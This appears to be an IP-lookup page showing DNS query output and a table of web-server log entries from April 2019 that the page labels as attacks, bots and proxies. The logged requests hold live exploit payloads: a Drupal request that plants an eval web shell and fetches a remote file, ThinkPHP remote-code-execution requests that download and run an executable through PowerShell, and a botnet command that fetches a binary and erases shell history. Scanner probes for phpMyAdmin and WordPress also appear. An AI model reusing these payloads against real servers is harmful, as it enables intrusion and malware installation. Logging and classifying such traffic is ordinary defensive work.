City: unknown
Region: unknown
Country: Portugal
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 188.81.227.227
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 45255
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;188.81.227.227. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025021500 1800 900 604800 86400
;; Query time: 12 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 15 20:08:45 CST 2025
;; MSG SIZE rcvd: 107
227.227.81.188.in-addr.arpa domain name pointer bl16-227-227.dsl.telepac.pt.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
227.227.81.188.in-addr.arpa name = bl16-227-227.dsl.telepac.pt.
Authoritative answers can be found from:
| IP | Type | Details | Datetime |
|---|---|---|---|
| 101.226.79.190 | attack | 101.226.79.190 - - [10/Apr/2019:21:18:52 +0800] "GET /lindex.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.79.190 - - [10/Apr/2019:21:18:52 +0800] "GET /lindex.php HTTP/1.1" 404 209 "http://118.25.52.138/lindex.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [10/Apr/2019:21:18:52 +0800] "GET /admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [10/Apr/2019:21:18:53 +0800] "GET /admin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/admin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-11 05:59:06 |
| 35.200.107.73 | attack | 35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" |
2019-04-16 21:34:35 |
| 192.99.15.141 | attack | 192.99.15.141 - - [10/Apr/2019:21:48:58 +0800] "GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 29740 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" |
2019-04-11 06:38:05 |
| 221.230.132.58 | attack | 221.230.132.58 - - [11/Apr/2019:00:24:49 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
221.230.132.58 - - [11/Apr/2019:00:24:49 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-11 05:58:21 |
| 118.25.49.95 | attack | 118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%2
0(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.
1" 404 232 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Ne
t.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9
.0; Windows NT 6.1)"
118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 194 "http://118.25.52.138:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars
[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 404 232 "http://118.25.52.138:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars
[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-10 07:14:51 |
| 123.206.22.203 | attack | 123.206.22.203 - - [19/Apr/2019:14:04:26 +0800] "POST /webslee.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:26 +0800] "POST /q.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:26 +0800] "POST /pe.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:34 +0800] "POST /hm.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:42 +0800] "POST /cainiao.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:42 +0800] "POST /zuoshou.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:46 +0800] "POST /zuo.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 123.206.22.203 - - [19/Apr/2019:14:04:47 +0800] "POST /aotu.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" |
2019-04-19 14:05:13 |
| 52.114.6.38 | bots | 52.114.6.38 - - [12/Apr/2019:14:09:43 +0800] "GET /check-ip/106.13.55.69 HTTP/1.1" 200 53479 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5" 52.114.6.38 - - [12/Apr/2019:14:09:43 +0800] "GET /static/favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5" |
2019-04-12 14:15:45 |
| 68.183.123.123 | attack | 68.183.123.123 - - [15/Apr/2019:09:53:42 +0800] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:43 +0800] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:43 +0800] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:44 +0800] "GET /sql/websql/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:44 +0800] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-15 10:18:04 |
| 54.242.155.91 | attack | 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET HTTP/1.1" 400 182 "-" "-" |
2019-04-14 19:37:25 |
| 113.4.133.2 | attack | 攻击 端口扫描 |
2019-04-15 14:29:58 |
| 123.190.152.140 | attack | 123.190.152.140 - - [14/Apr/2019:09:56:22 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-14 10:04:14 |
| 80.82.70.187 | botsattack | 80.82.70.187 - - [11/Apr/2019:11:47:51 +0800] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 301 194 "-" "Mozilla" |
2019-04-11 11:52:03 |
| 118.25.145.186 | attack | 118.25.145.186 - - [10/Apr/2019:12:27:07 +0800] "{\\x22id\\x22:1,\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22method\\x22:\\x22login\\x22,\\x22params\\x22:{\\x22login\\x22:\\x22x\\x22,\\x22pass\\x22:\\x22x\\x22,\\x22agent\\x22:\\x22x\\x22}}" 400 182 "-" "-" |
2019-04-10 12:27:32 |
| 61.86.79.193 | attack | 61.86.79.193 - - [11/Apr/2019:07:03:06 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.13 1/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)" |
2019-04-11 07:13:26 |
| 89.248.172.90 | proxy | 89.248.172.90 - - [17/Apr/2019:14:10:41 +0800] "CONNECT dnspod.qcloud.com:443 HTTP/1.1" 405 519 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" |
2019-04-17 15:15:55 |